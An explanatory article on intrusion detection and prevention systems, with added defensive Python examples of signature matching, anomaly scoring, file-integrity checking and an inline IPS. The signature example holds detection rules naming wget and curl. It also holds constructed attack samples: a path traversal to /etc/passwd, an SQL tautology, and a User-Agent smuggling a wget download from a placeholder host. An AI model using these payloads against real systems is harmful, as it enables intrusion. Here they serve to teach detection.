IDS technology
Based on their data sources, IDS can be divided into host-based IDS (HIDS) and network-based IDS (NIDS).
Each of HIDS and NIDS can detect intrusion behaviour that the other cannot, so they complement each other. An ideal IDS product combines the two, and mainstream IDS products currently use a hybrid architecture that combines HIDS and NIDS.
Traditional intrusion detection technologies include:
1. Pattern Matching
Pattern matching compares the collected information against a database of known network intrusion and system misuse patterns to detect activity that violates security policy. An attack pattern can be expressed either as a process or as an output.
This method only needs to collect the relevant data sets for judgment, which reduces system load. The technology is mature, and its detection accuracy and efficiency are high. However, the pattern database must be updated constantly to keep pace with emerging attack methods, and it cannot detect unknown attacks.
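The following is an added illustration, not code from the original article: a minimal signature-based detector of the kind just described. The three rules and the sample request excerpts are constructed for this example and are not from any real IDS ruleset; the last sample shows the weakness the text names, an attack the library has no pattern for and therefore misses.

```python
# Added example (not from the original article): a toy signature matcher.
# Rules and sample events are constructed for illustration only.
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Signature:
    sid: int             # rule identifier
    name: str            # human-readable alert name
    pattern: re.Pattern  # what the rule looks for in the event payload


# A toy pattern library. Real libraries hold thousands of entries and must be
# updated constantly, which is the maintenance burden the text points out.
SIGNATURES = [
    Signature(1001, "HTTP path traversal", re.compile(r"\.\./")),
    Signature(1002, "SQL tautology in query string",
              re.compile(r"'\s*or\s+'?1'?\s*=\s*'?1", re.I)),
    Signature(1003, "Download tool after command separator in User-Agent",
              re.compile(r"User-Agent:.*(;|\|)\s*(cat|wget|curl)\b", re.I)),
]


def match_signatures(payload: str, signatures=SIGNATURES) -> list[int]:
    """Return the ids of every signature whose pattern occurs in the payload."""
    return [sig.sid for sig in signatures if sig.pattern.search(payload)]


def scan(events: dict[str, str]) -> dict[str, list[int]]:
    """Run the whole pattern library over a batch of named events."""
    return {name: match_signatures(payload) for name, payload in events.items()}


# Constructed sample events: plain-text request excerpts, not captured traffic.
SAMPLE_EVENTS = {
    "normal_get": "GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\n",
    "traversal":  "GET /static/../../etc/passwd HTTP/1.1\r\nUser-Agent: curl/8.0\r\n",
    "sqli":       "GET /login?user=admin' OR '1'='1 HTTP/1.1\r\n",
    "ua_cmd":     "GET / HTTP/1.1\r\nUser-Agent: x; wget http://example.invalid/p\r\n",
    # An injection variant the library has no rule for: pattern matching
    # cannot flag what it has never been told about.
    "unknown":    "GET /login?user=admin'/**/UNION/**/SELECT HTTP/1.1\r\n",
}

if __name__ == "__main__":
    for name, hits in scan(SAMPLE_EVENTS).items():
        print(f"{name:11s} -> {hits or 'no match'}")
```

Note that the `traversal` sample also carries a `curl` User-Agent but does not trip rule 1003, because that rule requires a command separator before the tool name; whether a rule is written that tightly is exactly what decides its false positive rate.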
2. Anomaly Detection
Anomaly detection first builds a statistical profile of system objects (users, files, directories, and devices), including measured attributes of normal use such as access counts, operation failures, and latency. The average values of these attributes are compared with the observed behaviour of the network and system; when an observed value falls outside the normal range, the IDS judges whether an intrusion has occurred. The advantage of anomaly detection is that it can detect unknown and complex intrusions. The disadvantage is that it has both a high false positive rate and a high false negative rate.
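As an added example (not part of the original article), here is a toy statistical profiler for one measured attribute, hourly failed-login counts per user. It learns a mean and standard deviation per object from a constructed baseline window and flags observations more than `k` standard deviations from the mean. The threshold parameter `k` makes the trade-off the text mentions visible: lowering it catches more, but starts flagging ordinary fluctuations.

```python
# Added example (not from the original article): a toy anomaly detector.
# Baseline and observation data are constructed for illustration.
from statistics import mean, pstdev

# Constructed baseline: hourly failed-login counts per user during a
# "known good" training window.
BASELINE = {
    "alice":      [0, 1, 0, 2, 1, 0, 1, 1, 0, 2, 1, 0],
    "svc_backup": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
}


def build_profile(baseline, min_std=0.5):
    """Per-object (mean, std-dev). A floor on std-dev keeps an object whose
    baseline never varies from having a zero-width "normal" band."""
    return {obj: (mean(vals), max(pstdev(vals), min_std))
            for obj, vals in baseline.items()}


def is_anomalous(profile, obj, observed, k=3.0):
    """True when the observation lies more than k std-devs from the mean.
    An object with no profile has no model of normal, so it is flagged."""
    if obj not in profile:
        return True
    mu, sigma = profile[obj]
    return abs(observed - mu) > k * sigma


def score_window(profile, observations, k=3.0):
    """Return (object, hour, value) for every observation over threshold."""
    return [(obj, hour, val)
            for obj, series in observations.items()
            for hour, val in enumerate(series)
            if is_anomalous(profile, obj, val, k)]


# Constructed observation window: alice has one burst, the service account
# (which never fails in the baseline) fails twice, and "mallory" is unseen.
OBSERVATIONS = {
    "alice":      [1, 0, 2, 9],
    "svc_backup": [0, 0, 2, 0],
    "mallory":    [1],
}

if __name__ == "__main__":
    prof = build_profile(BASELINE)
    for k in (3.0, 1.0):
        print(f"k={k}: {score_window(prof, OBSERVATIONS, k)}")
```

With `k=3.0` only the burst, the service-account failures and the unknown user are reported; with `k=1.0` alice's perfectly ordinary count of 2 is also flagged, which is the false positive problem in miniature.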
3. Integrity Analysis
Integrity analysis focuses on whether a file or object has been tampered with, relying mainly on the content and attributes of files and directories. It is particularly effective at detecting applications that have been modified or implanted with Trojan horses. Integrity analysis uses cryptographic message digest functions to identify even minor changes. Its advantage is that, whether or not pattern matching or statistical analysis detects the intrusion, integrity analysis will find it as long as the attack changes a file or object. Integrity analysis is generally run in batches and is not used for real-time response.
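The following batch integrity check is an added example, not code from the original article. It records a SHA-256 digest plus size and permission bits for every file under a directory, then compares a later snapshot against that baseline. The directory tree and the "tampering" are constructed inside a temporary directory so the block runs offline; the same-size byte change in `bin/login` is there to show why a digest catches what a size or timestamp check would not.

```python
# Added example (not from the original article): a batch file-integrity check.
# All files and modifications below are constructed in a temp directory.
import hashlib
import os
import stat
import tempfile
from pathlib import Path

TRACKED = ("sha256", "size", "mode")


def file_record(path: Path) -> dict:
    """Digest the content in chunks and capture the attributes we track."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    st = path.stat()
    return {"sha256": h.hexdigest(), "size": st.st_size,
            "mode": stat.S_IMODE(st.st_mode)}


def snapshot(root: Path) -> dict:
    """Baseline: relative path -> record for every regular file under root."""
    return {str(p.relative_to(root)): file_record(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare(baseline: dict, current: dict) -> dict:
    """Classify differences between two snapshots."""
    changed = {}
    for rel in baseline.keys() & current.keys():
        diff = [k for k in TRACKED if baseline[rel][k] != current[rel][k]]
        if diff:
            changed[rel] = diff
    return {"added": sorted(current.keys() - baseline.keys()),
            "removed": sorted(baseline.keys() - current.keys()),
            "changed": changed}


def demo() -> dict:
    """Build a small tree, baseline it, tamper with it, report the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        login = root / "bin" / "login"
        login.write_bytes(b"#!/bin/sh\nexec /sbin/real-login \"$@\"\n")
        (root / "etc").mkdir()
        hosts = root / "etc" / "hosts"
        hosts.write_text("127.0.0.1 localhost\n")
        os.chmod(hosts, 0o644)
        (root / "etc" / "motd").write_text("Welcome\n")
        base = snapshot(root)

        # Simulated tampering (constructed): a same-size byte change that only
        # the digest catches, an attribute-only change, a new file, a deletion.
        login.write_bytes(login.read_bytes().replace(b"real-login", b"real-l0gin"))
        os.chmod(hosts, 0o666)
        (root / "tmp").mkdir()
        (root / "tmp" / ".hidden").write_bytes(b"\x7fELF")
        (root / "etc" / "motd").unlink()
        return compare(base, snapshot(root))


if __name__ == "__main__":
    print(demo())
```

In a real deployment the baseline itself must be stored somewhere the monitored host cannot rewrite (read-only media or a separate host), or an intruder who can alter files can alter the baseline too.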
Problems faced by Intrusion Detection
1. False positives and false negatives
IDS often generates many false alarms. The main causes of false positives and false negatives are as follows:
● The main detection technology used by IDS today is pattern matching, but pattern libraries are simplistic, not updated in time, and incomplete, and they cannot detect unknown attacks;
● As networks grow in scale, heterogeneous platforms and technologies are adopted, and bandwidth in particular increases rapidly, the analysis and processing speed of IDS finds it ever harder to keep up with network traffic, resulting in packet loss;
● The growing number of network attack methods and the increasing complexity of attack techniques also raise the IDS false positive and false negative rates.
2. DoS Attacks
IDS is a fail-open mechanism: if the IDS itself is taken down by a denial-of-service attack, the network keeps running without it, which lets attackers launch attacks without being detected.
3. Insertion and evasion
Insertion attacks and evasion attacks are two kinds of attack that defeat IDS detection. In an insertion attack, specially crafted invalid packets are added to the data stream so that the IDS is misled about the attack; in an evasion attack, by contrast, the attacker bypasses IDS detection to reach the target host.
The intent of an insertion attack is to make the IDS raise frequent (false) alerts, although the attack itself has no real effect; the intent of an evasion attack is to genuinely escape IDS detection and attack the target host. Attackers often alter attack signatures to fool pattern-based IDS.
IDS Development Trend
As the window between a vulnerability's discovery and its exploitation shrinks, IDS based on signature detection and matching is no longer sufficient, and IDS is becoming one component of a security information management (SIM) framework.
Within the SIM framework, IDS functions can be enhanced through detection and reporting techniques. Analysts point out that the role of IDS is shifting toward investigation, evidence collection, and security analysis. In about five years, unified security management and kernel-level security technologies will together end the mission of signature-based IDS technology.
Joel Snyder, a member of the US online world lab alliance, believes that the future belongs to hybrid technology, with detection at both the network edge and the core layer, and that communication between sensor devices and correlation consoles on the network will become the mainstream of security applications.
Some vendors correlate IDS alerts with vulnerability information to compensate for IDS defects. SIM vendors have begun to take a more modular approach to security information analysis, combining vulnerability management, anomaly detection, network assessment, and honeypot modules with IDS modules to better identify and respond to security events.
IPS active protection
Although IDS is a popular solution for enterprises, it is not enough to block ever-evolving Internet attacks. A major problem with the intrusion detection system is that it does not actively block attacks before they occur. At the same time, many intrusion detection systems are signature-based, so they cannot detect new attacks or variants of old ones, and they cannot detect attacks carried in encrypted traffic.
An Intrusion Protection System (IPS) aims to provide proactive protection: it is designed to block intrusion activity and attack traffic before it causes loss, rather than merely sending an alert while or after the malicious traffic is transmitted.
An IPS can sit inline in the traffic path: it receives traffic from external systems on one network port, checks that it contains no abnormal activity or suspicious content, and then forwards it to internal systems through another port. In this way, a problematic packet and all subsequent packets of the same data stream can be dropped on the IPS device.
Put simply, an IPS is equivalent to adding an intrusion detection system to a firewall, but that does not mean an IPS can replace either the firewall or the IDS. A firewall is a coarse-grained access control product: it filters well on TCP/IP protocol attributes and in most cases also provides network address translation, service proxying, traffic statistics, and other functions.
Compared with a firewall, an IPS has a single function: it is placed inline in the network to filter out attacks the firewall cannot. Enterprise users generally care about whether their networks can be protected from attack, not about how many attacks can be detected.
This does not make the intrusion detection system useless, however. In specialized organizations and environments with high network security requirements, an IDS combined with other audit and tracking products can provide comprehensive audit material for enterprise information resources, which plays an important role in attack recovery, intrusion forensics, anomalous event identification, and network troubleshooting.
IPS currently falls mainly into the following types:
1. Host-Based Intrusion Protection (HIPS), which prevents a server's security vulnerabilities from being exploited by criminals;
2. Network-Based Intrusion Protection (NIPS), which protects network systems by inspecting network traffic. Once an intrusion is identified, NIPS can terminate the entire network session, not merely reset it;
3. Application intrusion protection, which extends host-based intrusion protection to a network device placed in front of the application server.
Challenges facing IPS
IPS technology faces many challenges, three of which stand out:
1. Single point of failure. The design requires an IPS to work inline in the network, which can create a bottleneck or a single point of failure. If an IDS fails, the worst case is that some attacks go undetected; if an inline IPS device fails, normal network operation is seriously affected. When an IPS goes down because of a fault, users face a denial of service caused by the IPS itself, and no customer can reach the applications the enterprise network provides.
2. Performance bottleneck. Even when an IPS device does not fail, it remains a potential network bottleneck: it adds latency and reduces network efficiency, and it must keep pace with network traffic of several gigabytes or more. Especially when a large signature library is loaded, even a well-designed inline IPS device cannot sustain the required response speed. Most high-end IPS vendors use custom hardware (FPGAs, network processors, and ASICs) to improve IPS throughput.
3. False positives and false negatives. IPS must also take false positive and false negative rates seriously. On a busy network, if 10 alerts are processed per second, the IPS must handle at least 36000 alerts per hour and 864000 per day. Once an alert is generated, the most basic requirement is that the IPS can process it effectively. If intrusion signatures are poorly written, "false positives" can be exploited, causing legitimate traffic to be intercepted unexpectedly.
With a real-time inline IPS, once an attack packet is intercepted, all data streams from the suspected attacker are blocked. If the traffic that triggered the false alarm happens to be part of a customer's order, the outcome is easy to imagine: the customer's entire session is closed, and every subsequent valid access request from that customer to the enterprise network is intercepted by the "diligent" IPS.
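The inline data path described in the IPS section above, and the false-positive collateral described in this paragraph, can both be seen in one small model. This is an added example, not code from the original article: the packets are constructed records, `naive_detector` is a stand-in for a poorly written signature, and the only real logic is the per-flow state, which is what turns one wrong verdict into a lost session.

```python
# Added example (not from the original article): a toy inline IPS data path.
# Packets, addresses and the detector rule are constructed for illustration.
from collections import namedtuple

# src/dst stand in for the full 5-tuple that identifies a flow.
Packet = namedtuple("Packet", "src dst payload")


def flow_key(pkt):
    return (pkt.src, pkt.dst)


class InlineIPS:
    """Receives on the external port, inspects, and either forwards to the
    internal port or drops. A DROP verdict is remembered per flow, so every
    later packet in that flow is dropped without further inspection."""

    def __init__(self, detector):
        self.detector = detector   # payload -> True if judged an attack
        self.blocked = set()       # flows with an earlier DROP verdict
        self.log = []              # (flow, verdict) for later audit

    def process(self, pkt):
        key = flow_key(pkt)
        if key in self.blocked:
            verdict = "DROP"
        elif self.detector(pkt.payload):
            self.blocked.add(key)  # this packet and the rest of the flow
            verdict = "DROP"
        else:
            verdict = "FORWARD"
        self.log.append((key, verdict))
        return verdict

    def run(self, packets):
        return [self.process(p) for p in packets]


def naive_detector(payload):
    """Stand-in for a badly written signature: it fires on the words
    "drop table" anywhere, including in ordinary English text."""
    return "drop table" in payload.lower()


# Constructed traffic: a legitimate customer session whose order note happens
# to contain the substring the rule keys on, followed by another customer.
CUSTOMER_SESSION = [
    Packet("198.51.100.7", "10.0.0.5", "GET /catalog HTTP/1.1"),
    Packet("198.51.100.7", "10.0.0.5",
           "POST /order item=table&note=please drop table at the back door"),
    Packet("198.51.100.7", "10.0.0.5", "GET /order/status HTTP/1.1"),
    Packet("198.51.100.7", "10.0.0.5", "GET /account HTTP/1.1"),
]
OTHER_SESSION = [Packet("203.0.113.9", "10.0.0.5", "GET /catalog HTTP/1.1")]


def demo():
    """Return the verdict list; one false positive drops the rest of the session."""
    ips = InlineIPS(naive_detector)
    return ips.run(CUSTOMER_SESSION + OTHER_SESSION)


if __name__ == "__main__":
    for pkt, verdict in zip(CUSTOMER_SESSION + OTHER_SESSION, demo()):
        print(f"{verdict:8s} {pkt.src} {pkt.payload[:40]}")
```

An IDS running the same rule would have produced one questionable alert for an analyst to dismiss; the inline device instead silences the customer for the remainder of the session, which is why the text insists that signature quality and alert handling matter far more once blocking is automatic.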
IDS and IPS will coexist
Although IPS has great advantages, Rony Thayer, a member of the US online world lab alliance, believes that IPS cannot replace IDS devices until reporting and analysis are mature enough to prevent false alarms. IPS may replace the detection systems on the perimeter defense line, but some locations in the network still need detection functions to supplement an IPS that cannot provide much event information.